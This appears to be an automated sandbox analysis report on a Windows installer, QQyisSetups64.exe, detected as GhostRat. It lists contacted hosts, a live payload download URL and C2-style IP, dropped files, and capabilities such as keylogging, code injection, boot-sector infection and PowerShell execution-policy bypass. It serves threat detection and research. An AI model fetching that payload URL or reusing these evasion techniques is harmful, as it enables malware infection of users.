                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581909 Sample: QQyisSetups64.exe Startdate: 29/12/2024 Architecture: WINDOWS Score: 100 52 tr.p.360.cn 2->52 54 st.p.360.cn 2->54 56 8 other IPs or domains 2->56 70 Suricata IDS alerts for network traffic 2->70 72 Yara detected GhostRat 2->72 74 Connects to many ports of the same IP (likely port scanning) 2->74 76 AI detected suspicious sample 2->76 9 QQyisSetups64.exe 19 2->9         started        14 inst.exe 21 57 2->14         started        16 svchost.exe 2->16         started        18 inst.exe 2->18         started        signatures3 process4 dnsIp5 58 118.107.44.219, 18852, 19091, 19092 BCPL-SGBGPNETGlobalASNSG Singapore 9->58 60 bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com 47.79.48.211, 443, 49708 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 9->60 40 C:\Users\user\Downloads\inst.exe, PE32 9->40 dropped 42 C:\Users\user\AppData\...\QQyisSetups64.exe, PE32 9->42 dropped 44 C:\Users\user\AppData\Local\...\inst[1].exe, PE32 9->44 dropped 46 C:\...\QQyisSetups64.exe:Zone.Identifier, ASCII 9->46 dropped 88 Detected unpacking (overwrites its own PE header) 9->88 20 QQyisSetups64.exe 3 4 9->20         started        62 seupdate.360qhcdn.com 39.156.85.200, 49756, 49767, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 14->62 64 39.156.85.201, 49758, 49766, 80 CMNET-GDGuangdongMobileCommunicationCoLtdCN China 14->64 68 9 other IPs or domains 14->68 48 C:\Users\user\AppData\Local\...\sites.dll, PE32 14->48 dropped 50 C:\Users\user\AppData\Local\...\360P2SP.dll, PE32 14->50 dropped 90 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 14->90 92 Contains functionality to infect the boot sector 14->92 94 Checks if browser processes are running 14->94 96 4 other signatures 14->96 66 127.0.0.1 unknown unknown 16->66 file6 signatures7 process8 file9 38 C:\Users\user\AppData\Local\updated.ps1, ASCII 20->38 dropped 78 Protects its processes via BreakOnTermination flag 20->78 80 Contains functionality to inject threads in other processes 20->80 82 Contains functionality to capture and log keystrokes 20->82 84 Contains functionality to inject code into remote processes 20->84 24 cmd.exe 1 20->24         started        27 cmd.exe 1 20->27         started        signatures10 process11 signatures12 86 Bypasses PowerShell execution policy 24->86 29 powershell.exe 1 23 24->29         started        32 conhost.exe 24->32         started        34 powershell.exe 5 27->34         started        36 conhost.exe 27->36         started        process13 signatures14 98 Loading BitLocker PowerShell Module 29->98

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          QQyisSetups64.exe0%VirustotalBrowse
                          QQyisSetups64.exe0%ReversingLabs
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe17%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll0%ReversingLabs
                          C:\Users\user\AppData\Roaming\QQyisSetups64.exe0%ReversingLabs
                          C:\Users\user\Downloads\inst.exe17%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cab0%Avira URL Cloudsafe
                          http://wpad.%s/wpad.dat0%Avira URL Cloudsafe
                          http://%s/wpad.dat0%Avira URL Cloudsafe
                          http://pinst.360.cn/360safe/h_inst.cab?rd=10788264XXQ0%Avira URL Cloudsafe
                          http://%s/%s.trt0%Avira URL Cloudsafe
                          http://pinst.360.cn/360safe/h_inst.cab?rd=10788264Hl0%Avira URL Cloudsafe
                          http://crl.microqz0%Avira URL Cloudsafe
                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/l0%Avira URL Cloudsafe
                          http://pinst.360.cn/zhuomian/desktopsafe.cab0%Avira URL Cloudsafe
                          http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab0%Avira URL Cloudsafe
                          http://%s/gf/360ini.cab0%Avira URL Cloudsafe
                          http://pinst.360.cn/360safe/h_inst.cab?rd=10788264HTTP:XX-0%Avira URL Cloudsafe
                          http://sfdw.360safe.com/setup.exe.exe0%Avira URL Cloudsafe
                          http://wpad.%s/wpad.dathttp://%s/wpad.datwpad0%Avira URL Cloudsafe
                          http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab0%Avira URL Cloudsafe
                          http://pinst.360.cn/360safe/h_inst.cabrd=107882641K:0%Avira URL Cloudsafe
                          https://bbs.360.cn/thread-16079507-1-1.html0%Avira URL Cloudsafe
                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exe0%Avira URL Cloudsafe
                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exea0%Avira URL Cloudsafe
                          http://pinst.360.cn/360safe/h_inst.cab0%Avira URL Cloudsafe
                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exep0%Avira URL Cloudsafe
                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeq0%Avira URL Cloudsafe
                          http://sfdw.360safe.com/safesetup_2000.exe3600%Avira URL Cloudsafe
                          https://bbs.360.cn/thread-16079507-1-1.htmlD0%Avira URL Cloudsafe
                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/0%Avira URL Cloudsafe
                          http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh0%Avira URL Cloudsafe
                          http://pinst.360.cn/360safe/h_inst.cab?rd=10788264FK0%Avira URL Cloudsafe
                          http://sfdw.360safe.com/superkiller/superkillerexe_ce61817f687d599de13ee9deb1af83e2_5.1.0.1181.cab0%Avira URL Cloudsafe
                          http://%s/%u%u.html0%Avira URL Cloudsafe
                          http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA0%Avira URL Cloudsafe
                          http://pinst.360.cn/360se/wssj_setup.cab0%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          tr.p.360.cn
                          1.192.136.134
                          truefalse
                            high
                            agt.p.360.cn
                            1.192.136.133
                            truefalse
                              high
                              agd2.p.360.cn
                              1.192.194.215
                              truefalse
                                high
                                bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com
                                47.79.48.211
                                truefalse
                                  unknown
                                  s.360.cn
                                  171.8.167.90
                                  truefalse
                                    high
                                    seupdate.360qhcdn.com
                                    39.156.85.200
                                    truefalse
                                      high
                                      st.p.360.cn
                                      1.192.136.170
                                      truefalse
                                        high
                                        agd.p.360.cn
                                        unknown
                                        unknownfalse
                                          high
                                          pinst.360.cn
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                              high
                                              http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                high
                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                  high
                                                  http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                    high
                                                    http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                      high
                                                      http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid=false
                                                        high
                                                        http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                          high
                                                          http://s.360.cn/safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0false
                                                            high
                                                            https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exefalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://s.360.cn/safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0false
                                                              high
                                                              http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid=false
                                                                high
                                                                http://s.360.cn/safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid=false
                                                                  high
                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeinst.exe, 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmp, inst.exe, 0000000F.00000000.1438674426.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460442759.0000000000B58000.00000004.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445103284.0000000000B53000.00000008.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.drfalse
                                                                    high
                                                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0QQyisSetups64.exe, QQyisSetups64.exe.3.drfalse
                                                                      high
                                                                      http://pinst.360.cn/zhuomian/desktopsafe.cabinst.exe, inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.microsoftpowershell.exe, 0000000D.00000002.1402669739.00000000033A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10inst.exefalse
                                                                          high
                                                                          http://s.360.cn/safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.0000000002913000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/lQQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crl.microqzpowershell.exe, 0000000C.00000002.1436414735.000000000845E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://hao.360.cn/?installerinst.exefalse
                                                                              high
                                                                              http://pinst.360.cn/360safe/h_inst.cab?rd=10788264XXQinst.exe, 0000000F.00000002.2576022298.0000000003F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://s.360.cn/safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefininst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://aka.ms/pscore6lBpowershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://hao.360.cninst.exefalse
                                                                                    high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://%s/%s.trtinst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://s.360.cn/safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinst.exe, 0000000F.00000002.2559394305.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://wpad.%s/wpad.datinst.exefalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.1427177445.0000000004C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1403379850.0000000004D47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabinst.exefalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://down.360safe.com/setupbeta.exeinst.exefalse
                                                                                            high
                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://pinst.360.cn/360safe/h_inst.cab?rd=10788264Hlinst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/soap/encoding/360P2SP.dll.15.drfalse
                                                                                                high
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://%s/wpad.datinst.exefalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://go.micropowershell.exe, 0000000C.00000002.1427177445.0000000005363000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://hao.360.cominst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                      high
                                                                                                      https://contoso.com/Iconpowershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.ver)svchost.exe, 00000012.00000002.2576153550.000002945F200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cabinst.exe, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%dinst.exefalse
                                                                                                            high
                                                                                                            http://www.symauth.com/cps0(inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drfalse
                                                                                                              high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1425978622.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://%s/gf/360ini.cabinst.exefalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://down.360safe.com/setup.exePathSOFTWAREinst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr, sites.dll.15.drfalse
                                                                                                                  high
                                                                                                                  http://wpad.%s/wpad.dathttp://%s/wpad.datwpadinst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%sinst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                    high
                                                                                                                    https://g.live.com/odclientsettings/Prod1C:qmgr.db.18.drfalse
                                                                                                                      high
                                                                                                                      http://s.360.cn/safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefininst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1533920373.0000000003891000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://bbs.360.cn/thread-16079507-1-1.htmlinst.exefalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://hao.360.cn/inst.exefalse
                                                                                                                          high
                                                                                                                          http://www.symauth.com/rpa00inst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000C.00000002.1427177445.0000000005214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1427177445.0000000004D85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://pinst.360.cn/360safe/h_inst.cabrd=107882641K:inst.exe, 0000000F.00000002.2575396513.0000000003ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://down.360safe.com/h11=inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drfalse
                                                                                                                                high
                                                                                                                                http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                                  high
                                                                                                                                  http://www.360.cninst.exe, 0000000F.00000003.1479947646.00000000038AC000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003A39000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr, sites.dll.15.drfalse
                                                                                                                                    high
                                                                                                                                    http://123.com/inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.incredibuild.comQQyisSetups64.exe, QQyisSetups64.exe.3.drfalse
                                                                                                                                        high
                                                                                                                                        http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cabinst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://down.360safe.com/setup.exeinst.exefalse
                                                                                                                                          high
                                                                                                                                          http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcompinst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                                            high
                                                                                                                                            http://ocsp.sectigo.com0QQyisSetups64.exe, QQyisSetups64.exe.3.drfalse
                                                                                                                                              high
                                                                                                                                              http://pinst.360.cn/360safe/h_inst.cab?rd=10788264HTTP:XX-inst.exe, 0000000F.00000002.2575396513.0000000003AC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://sfdw.360safe.com/setup.exe.exeinst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://contoso.com/Licensepowershell.exe, 0000000C.00000002.1431723731.0000000005C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.360.cn/inst.exe, inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.drfalse
                                                                                                                                                    high
                                                                                                                                                    http://down.360safe.com/setup.exehttp://dinst.exe, 00000010.00000002.1460402312.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://s.360.cn/safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefiinst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#QQyisSetups64.exe, QQyisSetups64.exe.3.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeaQQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://s.360.cn/safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://s.360.cn/safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinst.exe, 0000000F.00000002.2573218002.00000000028D2000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000818000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.000000000084F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://s.360.cn/safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefiinst.exe, 0000000F.00000003.1534492876.000000000293F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://pinst.360.cn/360safe/h_inst.cabinst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000000.1438693132.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460510904.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exeqQQyisSetups64.exe, 00000003.00000002.1457521079.0000000000CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com/inst.exepQQyisSetups64.exe, 00000003.00000002.1456312362.000000000019A000.00000004.00000010.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1456369398.0000000000400000.00000040.00000001.01000000.00000004.sdmp, QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, QQyisSetups64.exe, 00000006.00000002.2556409168.000000000019D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
